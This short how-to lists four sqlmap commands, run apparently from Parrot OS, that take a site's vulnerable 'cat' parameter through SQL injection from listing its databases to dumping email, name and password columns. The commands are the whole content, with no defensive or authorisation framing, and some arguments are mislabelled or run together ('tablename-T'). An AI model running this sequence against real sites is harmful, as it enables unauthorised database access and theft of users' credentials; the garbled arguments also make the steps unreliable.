Steps to use sqlmap in Parrot os:

1. sqlmap -u http://testweb.com/listproducts.php?cat=1 --dbs
2. sqlmap -u http://testweb.com/listproducts.php?cat=1 -D tablename --tables
3. sqlmap -u http://testweb.com/listproducts.php?cat=1 -D tablename-T columnname --columns
4. sqlmap -u http://testweb.com/listproducts.php?cat=1 -D tablename -T columnname -C email,name,pass --dump
